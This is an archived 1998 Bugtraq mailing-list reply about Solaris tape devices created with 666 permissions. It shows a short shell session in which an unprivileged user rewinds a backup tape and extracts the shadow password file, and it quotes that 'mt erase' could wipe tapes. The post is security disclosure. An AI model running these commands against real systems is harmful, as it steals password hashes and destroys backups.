[8266] in bugtraq
Re: solaris tape dev permission stupidity
daemon@ATHENA.MIT.EDU (Robert Thomas)
Fri Oct 23 18:29:07 1998
Date: Thu, 22 Oct 1998 12:17:54 +1000
Reply-To: Robert Thomas <rob@RPI.NET.AU>
From: Robert Thomas <rob@RPI.NET.AU>
X-To: joshua grubman <jg@FALSE.NET>
To: BUGTRAQ@NETSPACE.ORG
joshua grubman wrote:
> under solaris, scsi tape devices (/dev/rmt/*, which are linked to the st@x,x:
> devs in /devices) are created with the permissions bits set to 666. this allows
> a mallicious user with a login on your system to 'mt erase' the contents of any
> tape devices connected to your system.
It's not that simple. Say, for example, you the unix administrator, as a good
boy/girl, does a daily backup... That backup is written to the tape. All is
well and good. You leave your desk, and start to wander over to the computer
room, to pull the tape out of the drive. IN that time, someone's done:
lamer@leeto$ cd
lamer@leeto$ mt -f /dev/nrmt/0h rewind
lamer@leeto$ tar xvf /dev/nrmt/0h etc/shadow
...
lamer@leeto$ cd etc
lamer@leeto$ more shadow
..shadow password entry..
and your shadow password file is open to the world.
Just one, of many, bad-things(tm) that can be done with lame-arsed tape
permissions.
--Rob Thomas
